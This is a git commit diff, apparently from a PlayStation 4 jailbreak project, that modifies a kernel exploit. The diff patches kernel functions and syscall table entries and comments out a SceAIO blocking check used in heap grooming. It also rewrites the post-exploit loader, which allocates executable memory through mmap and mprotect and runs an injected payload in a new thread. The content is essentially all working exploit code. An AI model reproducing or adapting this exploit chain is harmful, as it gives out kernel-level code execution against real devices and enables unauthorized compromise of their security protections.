ABC Fix: the number of blocking requests needed to be 2

2025-05-28 17:52:50 -06:00
parent 5e463303bb
commit 5137f7bf53
4 changed files with 45 additions and 5 deletions
@@ -97,9 +97,10 @@ void do_patch(void) {
    write8(kbase, KERNEL_copyinstr, 0xEB);
    write8(kbase, KERNEL_copystr, 0xEB);
    write16(kbase, KERNEL_veriPatch, 0x9090);
-    write32(kbase, KERNEL_setcr0_patch, 0xC3C7220F);        
+    write32(kbase, KERNEL_setcr0_patch, 0xC3C7220F);
+        
    const size_t offset_sysent_11 = 0x1100520;
-    write32(kbase, offset_sysent_11, 2);
+    write32(kbase, offset_sysent_11, 6);
    write64(kbase, offset_sysent_11 + 8, kbase + 0x4c7ad);
    write32(kbase, offset_sysent_11 + 0x2c, 1);  
   
@@ -1619,7 +1619,7 @@ function setup(block_fd) {
    }
    aio_submit_cmd(AIO_CMD_READ, reqs1.addr, num_workers, block_id.addr);

-    {
+    /*{
        const reqs1 = make_reqs1(1);
        const timo = new Word(1);
        const id = new Word();
@@ -1631,7 +1631,7 @@ function setup(block_fd) {
            die(`SceAIO system not blocked. errno: ${err}`);
        }
        free_aios(id.addr, 1);
-    }
+    }*/

    log('heap grooming');
    // chosen to maximize the number of 0x80 malloc allocs per submission
@@ -1745,7 +1745,7 @@ export async function kexploit() {
    }
 }

-kexploit().then(() => {
+/*kexploit().then(() => {
    var payload_buffer = chain.sysp('mmap', new Int(0x26200000, 0x9), 0x300000, PROT_READ | PROT_WRITE | PROT_EXEC, 0x41000, -1, 0);
    var payload_loader = new View4(window.pld);
    chain.sys('mprotect', payload_loader.addr, payload_loader.size, PROT_READ | PROT_WRITE | PROT_EXEC);
@@ -1760,4 +1760,43 @@ kexploit().then(() => {
        payload_loader.addr,
        payload_buffer,
    );
+})*/
+
+
+kexploit().then(() => {
+    function malloc(sz) {
+        var backing = new Uint8Array(0x10000 + sz);
+        nogc.push(backing);
+        var ptr = mem.readp(mem.addrof(backing).add(0x10));
+        ptr.backing = backing;
+        return ptr;
+    }
+
+    function malloc32(sz) {
+        var backing = new Uint8Array(0x10000 + sz * 4);
+        nogc.push(backing);
+        var ptr = mem.readp(mem.addrof(backing).add(0x10));
+        ptr.backing = new Uint32Array(backing.buffer);
+        return ptr;
+    }
+    window.pld_size = new Int(0x26200000, 0x9);
+
+    var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);
+    var payload = window.pld;
+    var bufLen = payload.length * 4
+    var payload_loader = malloc32(bufLen);
+    var loader_writer = payload_loader.backing;
+    for (var i = 0; i < payload.length; i++) {
+        loader_writer[i] = payload[i];
+    }
+    chain.sys('mprotect', payload_loader, bufLen, (0x1 | 0x2 | 0x4));
+    var pthread = malloc(0x10);
+
+    call_nze(
+        'pthread_create',
+        pthread,
+        0,
+        payload_loader,
+        payload_buffer,
+    );
 })